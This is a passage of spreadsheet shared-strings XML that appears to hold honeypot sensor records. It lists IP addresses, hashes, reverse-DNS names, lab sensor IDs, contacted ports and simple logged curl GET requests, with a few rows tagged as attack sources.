  <si>
    <t>a72401a9aa3bf77692fa8f0e6410f5f3</t>
  </si>
  <si>
    <t>114.35.174.39</t>
  </si>
  <si>
    <t>114-35-174-39.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;23&amp;&amp;37883</t>
  </si>
  <si>
    <t>::ffff:7223:ae27</t>
  </si>
  <si>
    <t>387386eb036ad0c39f6cb4aab20759be</t>
  </si>
  <si>
    <t>220.132.194.158</t>
  </si>
  <si>
    <t>220-132-194-158.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;35882&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;42518</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:c29e</t>
  </si>
  <si>
    <t>a71ebacb96f9fb5e765791bdc310006e</t>
  </si>
  <si>
    <t>117.206.130.113</t>
  </si>
  <si>
    <t>::ffff:75ce:8271</t>
  </si>
  <si>
    <t>77560381f4d74fc6570af4af98ad3824</t>
  </si>
  <si>
    <t>117.206.60.103</t>
  </si>
  <si>
    <t>::ffff:75ce:3c67</t>
  </si>
  <si>
    <t>18037d0cfa0f0e036acbdfb29fbf966e</t>
  </si>
  <si>
    <t>27.255.225.187</t>
  </si>
  <si>
    <t>::ffff:1bff:e1bb</t>
  </si>
  <si>
    <t>794d4d7030cb9d0d5e03133fe6e26d91</t>
  </si>
  <si>
    <t>152.59.170.119</t>
  </si>
  <si>
    <t>::ffff:983b:aa77</t>
  </si>
  <si>
    <t>5ebebf1d28b59defad31ecdcb04e6e68</t>
  </si>
  <si>
    <t>103.67.49.84</t>
  </si>
  <si>
    <t>::ffff:6743:3154</t>
  </si>
  <si>
    <t>bfcc83be57712f8e07b462c785ee8cb3</t>
  </si>
  <si>
    <t>122.117.124.137</t>
  </si>
  <si>
    <t>122-117-124-137.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_NTP_H28&amp;&amp;SMA-LAB_HTTP_H15&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;9100&amp;&amp;5900&amp;&amp;123&amp;&amp;80&amp;&amp;53&amp;&amp;22&amp;&amp;4384&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:7c89</t>
  </si>
  <si>
    <t>d86f1d7416ee503b0cd5e43c00aae8fd</t>
  </si>
  <si>
    <t>59.180.189.121</t>
  </si>
  <si>
    <t>::ffff:3bb4:bd79</t>
  </si>
  <si>
    <t>8e44a7f6da953a5fc41490304ded5a08</t>
  </si>
  <si>
    <t>220.135.101.92</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-101-92.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;14294&amp;&amp;23&amp;&amp;37926&amp;&amp;37986&amp;&amp;38062&amp;&amp;38096&amp;&amp;37958&amp;&amp;38142&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:655c</t>
  </si>
  <si>
    <t>7798a6454eb5715a5bb8a5407fe04019</t>
  </si>
  <si>
    <t>117.209.78.100</t>
  </si>
  <si>
    <t>::ffff:75d1:4e64</t>
  </si>
  <si>
    <t>7f91d97866e57adf5bc1de75d32f8ad7</t>
  </si>
  <si>
    <t>220.135.83.34</t>
  </si>
  <si>
    <t>220-135-83-34.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_HTTP_H31&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;22&amp;&amp;445&amp;&amp;389&amp;&amp;5900&amp;&amp;80&amp;&amp;13201&amp;&amp;23&amp;&amp;41838&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc87:5322</t>
  </si>
  <si>
    <t>0d7fe8aa2366f522c874b1f2a8628603</t>
  </si>
  <si>
    <t>122.116.21.91</t>
  </si>
  <si>
    <t>122-116-21-91.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_DNS_H18&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;17340&amp;&amp;80&amp;&amp;53&amp;&amp;52473&amp;&amp;23&amp;&amp;53360&amp;&amp;53347&amp;&amp;9100&amp;&amp;NA&amp;&amp;24809&amp;&amp;35561&amp;&amp;35546&amp;&amp;35577</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:155b</t>
  </si>
  <si>
    <t>b13fb1fdc7920b973a6a57800f191a70</t>
  </si>
  <si>
    <t>14.195.143.52</t>
  </si>
  <si>
    <t>Mumbai (Hanuman Nagar)</t>
  </si>
  <si>
    <t>19.1162</t>
  </si>
  <si>
    <t>72.8635</t>
  </si>
  <si>
    <t>Tata Tele Services GSM</t>
  </si>
  <si>
    <t>2010-08-19</t>
  </si>
  <si>
    <t>TATAGSM</t>
  </si>
  <si>
    <t>::ffff:ec3:8f34</t>
  </si>
  <si>
    <t>95a368aa5148d3cbabcd8e373d53968d</t>
  </si>
  <si>
    <t>59.126.47.168</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-47-168.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;11917&amp;&amp;23&amp;&amp;38761&amp;&amp;51000&amp;&amp;9100&amp;&amp;33569</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:2fa8</t>
  </si>
  <si>
    <t>84dbd794ec2647d004269ac49e6ea22f</t>
  </si>
  <si>
    <t>117.242.102.160</t>
  </si>
  <si>
    <t>::ffff:75f2:66a0</t>
  </si>
  <si>
    <t>fc6c50f5d4486ee97bfb5ac68c8a1c66</t>
  </si>
  <si>
    <t>117.206.181.240</t>
  </si>
  <si>
    <t>25433&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75ce:b5f0</t>
  </si>
  <si>
    <t>5c7e6caa2978c84782a7ef8735aa3825</t>
  </si>
  <si>
    <t>61.3.72.19</t>
  </si>
  <si>
    <t>::ffff:3d03:4813</t>
  </si>
  <si>
    <t>a2a9a0e5ef8d13e8dfc7a7b3f727e022</t>
  </si>
  <si>
    <t>117.213.48.227</t>
  </si>
  <si>
    <t>::ffff:75d5:30e3</t>
  </si>
  <si>
    <t>93b225f927cb3f380d7538d9d441f553</t>
  </si>
  <si>
    <t>59.126.87.86</t>
  </si>
  <si>
    <t>59-126-87-86.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;51449&amp;&amp;23&amp;&amp;50191&amp;&amp;50214&amp;&amp;80&amp;&amp;9100&amp;&amp;48661</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:5756</t>
  </si>
  <si>
    <t>28daf46811ecfaf729a4798bccaad0dc</t>
  </si>
  <si>
    <t>202.140.131.11</t>
  </si>
  <si>
    <t>::ffff:ca8c:830b</t>
  </si>
  <si>
    <t>16dee3ca8281fe00aa6acbbe3a532223</t>
  </si>
  <si>
    <t>117.199.219.85</t>
  </si>
  <si>
    <t>::ffff:75c7:db55</t>
  </si>
  <si>
    <t>94a62afc316fcb27a387a6ae470d1b4f</t>
  </si>
  <si>
    <t>134.249.202.156</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;40821&amp;&amp;8953&amp;&amp;40822</t>
  </si>
  <si>
    <t>2011-11-07</t>
  </si>
  <si>
    <t>::ffff:86f9:ca9c</t>
  </si>
  <si>
    <t>931ba62459af1012e4bf1eff1f59f49a</t>
  </si>
  <si>
    <t>220.133.66.155</t>
  </si>
  <si>
    <t>220-133-66-155.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;29757&amp;&amp;23&amp;&amp;NA&amp;&amp;37086&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc85:429b</t>
  </si>
  <si>
    <t>49a72ceef2ab0752ea94317347f8ab6d</t>
  </si>
  <si>
    <t>117.243.144.120</t>
  </si>
  <si>
    <t>::ffff:75f3:9078</t>
  </si>
  <si>
    <t>e211cd7d4a84273f85753e8a92b80208</t>
  </si>
  <si>
    <t>117.209.202.151</t>
  </si>
  <si>
    <t>::ffff:75d1:ca97</t>
  </si>
  <si>
    <t>1bb47662bf8f6180f38a24e65817334b</t>
  </si>
  <si>
